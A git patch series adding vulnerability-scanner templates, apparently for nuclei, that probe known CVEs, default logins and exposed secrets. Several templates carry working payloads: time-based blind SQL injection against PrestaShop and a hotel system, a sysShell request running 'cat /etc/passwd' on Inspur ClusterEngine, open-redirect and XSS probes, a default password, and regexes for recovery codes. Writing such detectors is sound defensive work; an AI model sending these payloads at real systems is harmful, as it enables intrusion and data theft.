From 72c56e0ff027d99b29de25ea65cd66aaca6ae555 Mon Sep 17 00:00:00 2001 From: jaimin4949 <62239432+jaimin4949@users.noreply.github.com> Date: Thu, 18 Feb 2021 01:57:08 +0530 Subject: [PATCH 0001/1415] CVE-2021-3110 Blind Sqli --- cves/2021/CVE-2021-3110.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cves/2021/CVE-2021-3110.yaml diff --git a/cves/2021/CVE-2021-3110.yaml b/cves/2021/CVE-2021-3110.yaml new file mode 100644 index 0000000000..5f693d7800 --- /dev/null +++ b/cves/2021/CVE-2021-3110.yaml @@ -0,0 +1,24 @@ +id: cve-2021-3110 + +info: + name: prestshop CMS SQL Injection + author: Jaimin Gondaliya + severity: high + description: Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection + + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(5)))xoOt)" + matchers-condition: and + matchers: + - type: word + words: + - "average_grade" + - "1 AND (SELECT 3875 FROM (SELECT(SLEEP(5)))xoOt)" + condition: and + part: body + - type: status + status: + - 200 \ No newline at end of file From bb5589060b1712167ae4621d8bf2e7adfbdcc467 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Thu, 18 Feb 2021 10:43:09 +0530 Subject: [PATCH 0002/1415] updating few details --- cves/2021/CVE-2021-3110.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-3110.yaml b/cves/2021/CVE-2021-3110.yaml index 5f693d7800..a094975361 100644 --- a/cves/2021/CVE-2021-3110.yaml +++ b/cves/2021/CVE-2021-3110.yaml @@ -1,12 +1,13 @@ -id: cve-2021-3110 +id: CVE-2021-3110 info: name: prestshop CMS SQL Injection author: Jaimin Gondaliya - severity: high + severity: critical description: Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection + reference: https://nvd.nist.gov/vuln/detail/CVE-2021-3110 + tags: cve,cve2021,sqli,prestshop - requests: - method: GET path: @@ -19,6 +20,7 @@ requests: - "1 AND (SELECT 3875 FROM (SELECT(SLEEP(5)))xoOt)" condition: and part: body + - type: status status: - 200 \ No newline at end of file From c8c2637480be55615d33a2c20cea8281faf637af Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 28 Apr 2021 17:59:27 +0000 Subject: [PATCH 0003/1415] Create nsicg-default-password.yaml --- .../nsicg/nsicg-default-password.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 default-logins/nsicg/nsicg-default-password.yaml diff --git a/default-logins/nsicg/nsicg-default-password.yaml b/default-logins/nsicg/nsicg-default-password.yaml new file mode 100644 index 0000000000..cba4d8b917 --- /dev/null +++ b/default-logins/nsicg/nsicg-default-password.yaml @@ -0,0 +1,27 @@ +id: nsicg-default-password + +info: + name: Nsicg Default Password + author: pikpikcu + severity: low + reference: | + - https://www.cnvd.org.cn/flaw/show/CNVD-2016-08603 + tags: nscig,default-logins + +requests: + - method: POST + path: + - "{{BaseURL}}/user/login/checkPermit" + body: "usrname=ns25000&pass=ns25000" + + matchers-condition: and + matchers: + + - type: word + words: + - '{"agreed":true}' + condition: and + + - type: status + status: + - 200 From 9c6cdf32ac1746f3d065b1cec687551774f035ca Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 16 May 2021 02:18:58 +0530 Subject: [PATCH 0004/1415] Update nsicg-default-password.yaml --- default-logins/nsicg/nsicg-default-password.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/nsicg/nsicg-default-password.yaml b/default-logins/nsicg/nsicg-default-password.yaml index cba4d8b917..b03791cb87 100644 --- a/default-logins/nsicg/nsicg-default-password.yaml +++ b/default-logins/nsicg/nsicg-default-password.yaml @@ -6,7 +6,7 @@ info: severity: low reference: | - https://www.cnvd.org.cn/flaw/show/CNVD-2016-08603 - tags: nscig,default-logins + tags: nscig,default-login requests: - method: POST From 163151df08c449e1dd097872fd55cb46f2ff3f7f Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 11 Nov 2021 11:25:19 -0600 Subject: [PATCH 0005/1415] Create github-recovery-code.yaml --- file/keys/github-recovery-code.yaml | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 file/keys/github-recovery-code.yaml diff --git a/file/keys/github-recovery-code.yaml b/file/keys/github-recovery-code.yaml new file mode 100644 index 0000000000..296287679e --- /dev/null +++ b/file/keys/github-recovery-code.yaml @@ -0,0 +1,16 @@ +id: github-recovery-code + +info: + name: Github Recovery Code + author: geeknik + severity: high + tags: github,recovery,token,file + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - '[0-9A-Za-z]{5}\-[0-9A-Za-z]{5}' From 1c073895d1fb4ee9bdcc193a9bf7dbf3661e9b4d Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 11 Nov 2021 11:26:56 -0600 Subject: [PATCH 0006/1415] Update github-recovery-code.yaml --- file/keys/github-recovery-code.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/keys/github-recovery-code.yaml b/file/keys/github-recovery-code.yaml index 296287679e..27b1383fc5 100644 --- a/file/keys/github-recovery-code.yaml +++ b/file/keys/github-recovery-code.yaml @@ -5,7 +5,7 @@ info: author: geeknik severity: high tags: github,recovery,token,file - + file: - extensions: - all From 7d2da0c9e8cddf66aa5fae081c92653a62022bbb Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 11 Nov 2021 11:28:03 -0600 Subject: [PATCH 0007/1415] Create gitlab-recovery-code.yaml --- file/keys/gitlab-recovery-code.yaml | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 file/keys/gitlab-recovery-code.yaml diff --git a/file/keys/gitlab-recovery-code.yaml b/file/keys/gitlab-recovery-code.yaml new file mode 100644 index 0000000000..8850e21664 --- /dev/null +++ b/file/keys/gitlab-recovery-code.yaml @@ -0,0 +1,16 @@ +id: gitlab-recovery-code + +info: + name: Github Recovery Code + author: geeknik + severity: high + tags: gitlab,recovery,token,file + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - '[0-9A-Za-z]{16}' From 51195b8a1f04f7554196f3d025fb20bbae3a0f8f Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 11 Nov 2021 11:29:14 -0600 Subject: [PATCH 0008/1415] Create discord-backup-code.yaml --- file/keys/discord-backup-code.yaml | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 file/keys/discord-backup-code.yaml diff --git a/file/keys/discord-backup-code.yaml b/file/keys/discord-backup-code.yaml new file mode 100644 index 0000000000..cfdff5c702 --- /dev/null +++ b/file/keys/discord-backup-code.yaml @@ -0,0 +1,16 @@ +id: discord-backup-code + +info: + name: Discord Backup Code + author: geeknik + severity: high + tags: discord,code,file + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - '[0-9A-Za-z]{4}\-[0-9A-Za-z]{4}' From 97efd96d919bb762a2e73a6daa4378014018134b Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 12 Nov 2021 10:12:05 -0600 Subject: [PATCH 0009/1415] Update github-recovery-code.yaml --- file/keys/github-recovery-code.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/keys/github-recovery-code.yaml b/file/keys/github-recovery-code.yaml index 27b1383fc5..8643d40105 100644 --- a/file/keys/github-recovery-code.yaml +++ b/file/keys/github-recovery-code.yaml @@ -13,4 +13,4 @@ file: extractors: - type: regex regex: - - '[0-9A-Za-z]{5}\-[0-9A-Za-z]{5}' + - '^[a-z]{1,4}[0-9]{1,4}\-[a-z0-9]{5}' From 690e296ceafd20748422f28b618fe87a7e77763a Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Tue, 8 Feb 2022 10:59:02 +0900 Subject: [PATCH 0010/1415] Create CVE-2020-13121.yaml --- CVE-2020-13121.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 CVE-2020-13121.yaml diff --git a/CVE-2020-13121.yaml b/CVE-2020-13121.yaml new file mode 100644 index 0000000000..7f8d07ee1b --- /dev/null +++ b/CVE-2020-13121.yaml @@ -0,0 +1,28 @@ +id: CVE-2020-13121 + +info: + name: Submitty 20.04.01 - Open redirect + author: 0x_Akoko + severity: medium + description: Submitty through 20.04.01 has an open redirect via authentication/login?old= during an invalid login attempt. + reference: + - https://github.com/Submitty/Submitty/issues/5265 + - https://www.cvedetails.com/cve/CVE-2020-13121 + tags: cve,cve2020,redirect,submitty + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-13121 + cwe-id: CWE-601 + +requests: + - method: GET + + path: + - '{{BaseURL}}/authentication/login?old=http%3A%2F%2Flexample.com' + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + part: header From 8c14733e0bc0251a705eeeb7df78a5657fe751fb Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 8 Feb 2022 23:35:08 +0530 Subject: [PATCH 0011/1415] Update and rename CVE-2020-13121.yaml to cves/2020/CVE-2020-13121.yaml --- CVE-2020-13121.yaml => cves/2020/CVE-2020-13121.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) rename CVE-2020-13121.yaml => cves/2020/CVE-2020-13121.yaml (94%) diff --git a/CVE-2020-13121.yaml b/cves/2020/CVE-2020-13121.yaml similarity index 94% rename from CVE-2020-13121.yaml rename to cves/2020/CVE-2020-13121.yaml index 7f8d07ee1b..2d44d41e5f 100644 --- a/CVE-2020-13121.yaml +++ b/cves/2020/CVE-2020-13121.yaml @@ -8,16 +8,15 @@ info: reference: - https://github.com/Submitty/Submitty/issues/5265 - https://www.cvedetails.com/cve/CVE-2020-13121 - tags: cve,cve2020,redirect,submitty classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2020-13121 cwe-id: CWE-601 + tags: cve,cve2020,redirect,submitty,oos requests: - method: GET - path: - '{{BaseURL}}/authentication/login?old=http%3A%2F%2Flexample.com' From 04d6e4968bd1042d13f9727d676b10dd7b56748f Mon Sep 17 00:00:00 2001 From: Wim Mostmans Date: Fri, 15 Apr 2022 09:35:30 +0200 Subject: [PATCH 0012/1415] Added S3 torrent Template --- misconfiguration/s3-torrent.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 misconfiguration/s3-torrent.yaml diff --git a/misconfiguration/s3-torrent.yaml b/misconfiguration/s3-torrent.yaml new file mode 100644 index 0000000000..5d6b5df433 --- /dev/null +++ b/misconfiguration/s3-torrent.yaml @@ -0,0 +1,21 @@ +id: s3-torrent + +info: + name: Detect S3 torrent downloads allowed + author: ambassify + severity: info + description: Detects if endpoint allows magic S3 torrent argument to download files + tags: aws,s3,bucket + +requests: + - method: GET + path: + - "{{BaseURL}}/?torrent" + + matchers-condition: and + matchers: + - type: word + words: + - 'RequestTorrentOfBucketError' + - 's3-tracker' + part: body From 5fdda06ce154a85dc4697110b3fe346c109143d3 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 4 May 2022 01:24:06 +0530 Subject: [PATCH 0013/1415] Create inspur-clusterengine-v4-sysshell-rce.yaml --- .../inspur-clusterengine-v4-sysshell-rce.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 vulnerabilities/other/inspur-clusterengine-v4-sysshell-rce.yaml diff --git a/vulnerabilities/other/inspur-clusterengine-v4-sysshell-rce.yaml b/vulnerabilities/other/inspur-clusterengine-v4-sysshell-rce.yaml new file mode 100644 index 0000000000..f0ff413987 --- /dev/null +++ b/vulnerabilities/other/inspur-clusterengine-v4-sysshell-rce.yaml @@ -0,0 +1,31 @@ +id: inspur-clusterengine-v4-sysshell-rce + +info: + name: Inspur Clusterengine V4 SYSshell RCE + author: ritikchaddha + severity: critical + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/master/PeiQi_Wiki/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B5%AA%E6%BD%AE/%E6%B5%AA%E6%BD%AEClusterEngineV4.0%20sysShell%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md + tags: inspur,clusterengine,rce + +requests: + - raw: + - | + POST /sysShell HTTP/1.1 + Host: {{Hostname}} + + op=doPlease&node=cu01&command=cat /etc/passwd + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + + - type: word + words: + - "root:[x*]:0:0:" + part: body + + - type: status + status: + - 200 From 1ff8b55f063c98bf302e5bc23ae98833260629a6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 9 May 2022 23:04:44 +0530 Subject: [PATCH 0014/1415] Update inspur-clusterengine-v4-sysshell-rce.yaml --- .../other/inspur-clusterengine-v4-sysshell-rce.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/vulnerabilities/other/inspur-clusterengine-v4-sysshell-rce.yaml b/vulnerabilities/other/inspur-clusterengine-v4-sysshell-rce.yaml index f0ff413987..2020138082 100644 --- a/vulnerabilities/other/inspur-clusterengine-v4-sysshell-rce.yaml +++ b/vulnerabilities/other/inspur-clusterengine-v4-sysshell-rce.yaml @@ -6,6 +6,9 @@ info: severity: critical reference: - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/master/PeiQi_Wiki/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B5%AA%E6%BD%AE/%E6%B5%AA%E6%BD%AEClusterEngineV4.0%20sysShell%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md + metadata: + verified: true + shodan-query: title="TSCEV4.0" tags: inspur,clusterengine,rce requests: @@ -14,17 +17,16 @@ requests: POST /sysShell HTTP/1.1 Host: {{Hostname}} - op=doPlease&node=cu01&command=cat /etc/passwd + op=doPlease&node=cu01&command=cat+/etc/passwd redirects: true max-redirects: 2 matchers-condition: and matchers: - - - type: word - words: - - "root:[x*]:0:0:" + - type: regex part: body + regex: + - "root:.*:0:0:" - type: status status: From 001868f981863bfbcfc4b93390f37695b2770627 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 6 Aug 2022 22:11:58 +0530 Subject: [PATCH 0015/1415] Update inspur-clusterengine-v4-sysshell-rce.yaml --- vulnerabilities/other/inspur-clusterengine-v4-sysshell-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/inspur-clusterengine-v4-sysshell-rce.yaml b/vulnerabilities/other/inspur-clusterengine-v4-sysshell-rce.yaml index 2020138082..24449c2470 100644 --- a/vulnerabilities/other/inspur-clusterengine-v4-sysshell-rce.yaml +++ b/vulnerabilities/other/inspur-clusterengine-v4-sysshell-rce.yaml @@ -5,7 +5,7 @@ info: author: ritikchaddha severity: critical reference: - - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/master/PeiQi_Wiki/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B5%AA%E6%BD%AE/%E6%B5%AA%E6%BD%AEClusterEngineV4.0%20sysShell%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md + - https://github.com/MzzdToT/ClusterEngineV4.0sysShell_rce metadata: verified: true shodan-query: title="TSCEV4.0" From 0ebad4fce6e1bf2b2284ba39e05e4128f485c248 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=EF=BC=A1=EF=BC=AE=EF=BC=A4=EF=BC=B2=EF=BC=A9=20=EF=BC=A8?= =?UTF-8?q?=2E=EF=BC=B5?= Date: Tue, 30 Aug 2022 20:40:36 +0700 Subject: [PATCH 0016/1415] Create wordpress-unauthenticated-private-messages.yaml --- ...ress-unauthenticated-private-messages.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 vulnerabilities/wordpress/wordpress-unauthenticated-private-messages.yaml diff --git a/vulnerabilities/wordpress/wordpress-unauthenticated-private-messages.yaml b/vulnerabilities/wordpress/wordpress-unauthenticated-private-messages.yaml new file mode 100644 index 0000000000..1837f67d0a --- /dev/null +++ b/vulnerabilities/wordpress/wordpress-unauthenticated-private-messages.yaml @@ -0,0 +1,28 @@ +id: wordpress-unauthenticated-enum + +info: + name: Unauthenticated Private Messages Disclosure + author: imhunterand + severity: medium + tags: wordpress + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-json/wp/v2/sensei-messages/" + + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Location: http(s|):\/\/[\w\.\-]+\/sensei-messages\/\w+' + part: header + - type: status + status: + - 301 + + extractors: + - type: regex + part: header + regex: + - 'sensei-messages\/\w+' From dfeee28760c11e1e5e1fee1d1aa1b69e42f0117a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 30 Aug 2022 21:29:02 +0530 Subject: [PATCH 0017/1415] Update and rename vulnerabilities/wordpress/wordpress-unauthenticated-private-messages.yaml to cves/2022/CVE-2022-2034.yaml --- cves/2022/CVE-2022-2034.yaml | 36 +++++++++++++++++++ ...ress-unauthenticated-private-messages.yaml | 28 --------------- 2 files changed, 36 insertions(+), 28 deletions(-) create mode 100644 cves/2022/CVE-2022-2034.yaml delete mode 100644 vulnerabilities/wordpress/wordpress-unauthenticated-private-messages.yaml diff --git a/cves/2022/CVE-2022-2034.yaml b/cves/2022/CVE-2022-2034.yaml new file mode 100644 index 0000000000..ef25bfbf09 --- /dev/null +++ b/cves/2022/CVE-2022-2034.yaml @@ -0,0 +1,36 @@ +id: CVE-2022-2034 + +info: + name: Sensei LMS < 4.5.0 - Unauthenticated Private Messages Disclosure + author: imhunterand + severity: medium + description: | + The Sensei LMS WordPress plugin before 4.5.0 does not have proper permissions set in one of its REST endpoint, allowing unauthenticated users to access private messages sent to teachers + reference: + - https://wpscan.com/vulnerability/aba3dd58-7a8e-4129-add5-4dd5972c0426 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2034 + classification: + cve-id: CVE-2022-2034 + tags: cve,cve2022,wordpress,wp-plugin,wp + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-json/wp/v2/sensei-messages/" + + matchers-condition: and + matchers: + - type: regex + part: header + regex: + - '(?i)Location: http(s|):\/\/[\w\.\-]+\/sensei-messages\/\w+' + + - type: status + status: + - 301 + + extractors: + - type: regex + part: header + regex: + - 'sensei-messages\/\w+' diff --git a/vulnerabilities/wordpress/wordpress-unauthenticated-private-messages.yaml b/vulnerabilities/wordpress/wordpress-unauthenticated-private-messages.yaml deleted file mode 100644 index 1837f67d0a..0000000000 --- a/vulnerabilities/wordpress/wordpress-unauthenticated-private-messages.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: wordpress-unauthenticated-enum - -info: - name: Unauthenticated Private Messages Disclosure - author: imhunterand - severity: medium - tags: wordpress - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-json/wp/v2/sensei-messages/" - - matchers-condition: and - matchers: - - type: regex - regex: - - '(?i)Location: http(s|):\/\/[\w\.\-]+\/sensei-messages\/\w+' - part: header - - type: status - status: - - 301 - - extractors: - - type: regex - part: header - regex: - - 'sensei-messages\/\w+' From 660805c44647b58e1103887b2f78ebf8eb68888a Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Wed, 28 Sep 2022 08:29:58 +0900 Subject: [PATCH 0018/1415] Create secui-waf-detect Signed-off-by: GwanYeong Kim --- technologies/secui-waf-detect.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 technologies/secui-waf-detect.yaml diff --git a/technologies/secui-waf-detect.yaml b/technologies/secui-waf-detect.yaml new file mode 100644 index 0000000000..6640ea70c1 --- /dev/null +++ b/technologies/secui-waf-detect.yaml @@ -0,0 +1,19 @@ +id: secui-waf-detect + +info: + name: SECUI WAF Detection + author: gy741 + severity: info + reference: + - https://www.secui.com/en/network/bluemaxng + tags: tech,panel,secui + +requests: + - method: GET + path: + - "{{BaseURL}}/resource/assets/img/favicon.ico" + + matchers: + - type: dsl + dsl: + - "status_code==200 && (\"-1101206929\" == mmh3(base64_py(body)))" From 55970869d6dedd6f921578f9842c580e09f8af39 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Wed, 28 Sep 2022 10:19:12 +0900 Subject: [PATCH 0019/1415] Create zebra-printer-detect Signed-off-by: GwanYeong Kim --- iot/zebra-printer-detect.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 iot/zebra-printer-detect.yaml diff --git a/iot/zebra-printer-detect.yaml b/iot/zebra-printer-detect.yaml new file mode 100644 index 0000000000..9abdae529e --- /dev/null +++ b/iot/zebra-printer-detect.yaml @@ -0,0 +1,29 @@ +id: zebra-printer-detect + +info: + name: Zebra Printer detection + author: gy741 + severity: info + reference: + - https://www.zebra.com/kr/ko/products/printers.html + tags: iot,zebra + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'https://www.zebra.com' + - 'www.zebra.com/support.html' + - 'config.html' + - 'Zebra Technologies' + condition: and + + - type: status + status: + - 200 From 64513e078612e31642806fbca09d41c685ebc0b9 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 29 Sep 2022 20:42:11 +0700 Subject: [PATCH 0020/1415] fix: false negative sophos-fw-version-detect - Added stop-at-first-match - Fix matcher by replace regex matcher with words matcher and added status matcher - Fix extractor regex --- exposed-panels/sophos-fw-version-detect.yaml | 20 +++++++++++++------- 1 file changed, 13 insertions(+), 7 deletions(-) diff --git a/exposed-panels/sophos-fw-version-detect.yaml b/exposed-panels/sophos-fw-version-detect.yaml index 6ac0642b6b..0ebf84815f 100644 --- a/exposed-panels/sophos-fw-version-detect.yaml +++ b/exposed-panels/sophos-fw-version-detect.yaml @@ -2,7 +2,7 @@ id: sophos-fw-version-detect info: name: Sophos Firewall version detection - author: organiccrap + author: organiccrap,daffainfo severity: info tags: panel,sophos @@ -11,17 +11,23 @@ requests: path: - "{{BaseURL}}/webconsole/webpages/login.jsp" - "{{BaseURL}}/userportal/webpages/myaccount/login.jsp" + + stop-at-first-match: true matchers-condition: and matchers: + - type: status + status: + - 200 + - type: word - words: - - "Sophos" - - type: regex part: body - regex: - - "(\\d{2}.\\d{1,2}.\\d{1,2}.\\d{2,3})" + words: + - 'Sophos' + - 'uiLangToHTMLLangAttributeValueMapping' + condition: or + extractors: - type: regex part: body regex: - - "(\\d{2}.\\d{1,2}.\\d{1,2}.\\d{2,3})" + - "(?m) Date: Fri, 30 Sep 2022 16:26:08 +0200 Subject: [PATCH 0022/1415] Add CVE-2020-21012 --- cves/2020/CVE-2020-21012.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2020/CVE-2020-21012.yaml diff --git a/cves/2020/CVE-2020-21012.yaml b/cves/2020/CVE-2020-21012.yaml new file mode 100644 index 0000000000..7d8b2e01e4 --- /dev/null +++ b/cves/2020/CVE-2020-21012.yaml @@ -0,0 +1,33 @@ +id: CVE-2020-21012 + +info: + name: Sourcecodester Hotel and Lodge Management System 2.0 - SQL Injection + author: edoardottt + severity: critical + description: | + Sourcecodester Hotel and Lodge Management System 2.0 is vulnerable to unauthenticated SQL injection and can allow remote attackers to execute arbitrary SQL commands via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. + reference: + - https://github.com/hitIer/web_test/tree/master/hotel + - https://nvd.nist.gov/vuln/detail/CVE-2020-21012 + classification: + cve-id: CVE-2020-21012 + tags: cve,sourcecodester,cve2020,sqli + +requests: + - raw: + - | + POST /forgot_password.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + btn_forgot=1&email=1' or sleep(5)%23 + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'duration>=5' + + - type: status + status: + - 200 \ No newline at end of file From 995d44c7be4be0333a4333346e2fc3abff0c2448 Mon Sep 17 00:00:00 2001 From: edoardottt Date: Fri, 30 Sep 2022 17:04:15 +0200 Subject: [PATCH 0023/1415] Add CVE-2020-24902 --- cves/2020/CVE-2020-24902.yaml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 cves/2020/CVE-2020-24902.yaml diff --git a/cves/2020/CVE-2020-24902.yaml b/cves/2020/CVE-2020-24902.yaml new file mode 100644 index 0000000000..53bb7db9f7 --- /dev/null +++ b/cves/2020/CVE-2020-24902.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-24902 + +info: + name: Quixplorer <=2.4.1 - Reflected XSS + author: edoardottt + severity: medium + description: | + Quixplorer <=2.4.1 is vulnerable to reflected cross-site scripting (XSS) caused by improper validation of user supplied input. A remote attacker could exploit this vulnerability using a specially crafted URL to execute a script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. + reference: + - https://dl.packetstormsecurity.net/1804-exploits/quixplorer241beta-xss.txt + - https://nvd.nist.gov/vuln/detail/CVE-2020-24902 + classification: + cve-id: CVE-2020-24902 + tags: cve,cve2020,quixplorer,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?action=post&order=bszop\">" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + + - type: word + part: body + words: + - "" \ No newline at end of file From c0edb297117c076892e39871d0864fa8d9445543 Mon Sep 17 00:00:00 2001 From: edoardottt Date: Fri, 30 Sep 2022 17:06:54 +0200 Subject: [PATCH 0024/1415] Add Google Dork - CVE-2020-24902 --- cves/2020/CVE-2020-24902.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/cves/2020/CVE-2020-24902.yaml b/cves/2020/CVE-2020-24902.yaml index 53bb7db9f7..fc47888811 100644 --- a/cves/2020/CVE-2020-24902.yaml +++ b/cves/2020/CVE-2020-24902.yaml @@ -11,6 +11,9 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-24902 classification: cve-id: CVE-2020-24902 + metadata: + google-dork: intitle:"My Download Server" + verified: "true" tags: cve,cve2020,quixplorer,xss requests: From cc131798135409a6a9488f0294a8995b16fd64bb Mon Sep 17 00:00:00 2001 From: edoardottt Date: Fri, 30 Sep 2022 17:19:39 +0200 Subject: [PATCH 0025/1415] Add CVE-2020-24903 --- cves/2020/CVE-2020-24903.yaml | 38 +++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 cves/2020/CVE-2020-24903.yaml diff --git a/cves/2020/CVE-2020-24903.yaml b/cves/2020/CVE-2020-24903.yaml new file mode 100644 index 0000000000..969977a6f3 --- /dev/null +++ b/cves/2020/CVE-2020-24903.yaml @@ -0,0 +1,38 @@ +id: CVE-2020-24903 + +info: + name: Cute Editor for ASP.NET 6.4 - Reflected XSS + author: edoardottt + severity: medium + description: | + Cute Editor for ASP.NET 6.4 is vulnerable to reflected cross-site scripting (XSS) caused by improper validation of user supplied input. A remote attacker could exploit this vulnerability using a specially crafted URL to execute a script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. + reference: + - https://seclists.org/bugtraq/2016/Mar/104 + - https://nvd.nist.gov/vuln/detail/CVE-2020-24903 + classification: + cve-id: CVE-2020-24903 + metadata: + google-dork: inurl:/CuteSoft_Client/CuteEditor/ Template.aspx + verified: "true" + tags: cve,cve2022,cuteeditor,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS\";>" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + + - type: word + part: body + words: + - "" \ No newline at end of file From cbc6e2f6f471b16343d0779c5c6fe784d5b6c0b5 Mon Sep 17 00:00:00 2001 From: edoardottt Date: Fri, 30 Sep 2022 18:27:58 +0200 Subject: [PATCH 0026/1415] Add CVE-2020-26248 --- cves/2020/CVE-2020-26248.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2020/CVE-2020-26248.yaml diff --git a/cves/2020/CVE-2020-26248.yaml b/cves/2020/CVE-2020-26248.yaml new file mode 100644 index 0000000000..acf37420a5 --- /dev/null +++ b/cves/2020/CVE-2020-26248.yaml @@ -0,0 +1,29 @@ +id: CVE-2020-26248 + +info: + name: PrestaShop ProductComments < 4.2.0 - SQL Injection + author: edoardottt + severity: critical + description: | + In 